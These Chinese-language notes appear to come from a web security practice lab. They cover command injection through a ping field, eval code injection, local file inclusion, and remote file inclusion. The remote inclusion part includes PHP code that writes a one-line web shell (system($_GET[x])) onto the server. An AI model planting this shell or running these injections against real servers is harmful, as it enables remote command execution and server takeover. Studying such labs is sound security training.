RCE
exec ping
输入ip地址
后面加上个ipconfig
exec “eval”
这里面直接写命令不行,但是加上函数名称就可以了,输入phpinfo()就行
文件
文件local
所以运用切换目录的方法切换到其他的php文件
file (remote)
测试之前需要把这俩个参数改成On
然后创建一个代码如下的txt文件
<?php
$myfile = fopen("yijuhua.php", "w");
$txt = '<?php system($_GET[x]);?>';
fwrite($myfile, $txt);
fclose($myfile);
?>
然后把filename后面的参数改为你所在的文件路径
之后服务器就会出现你刚才创建的文件
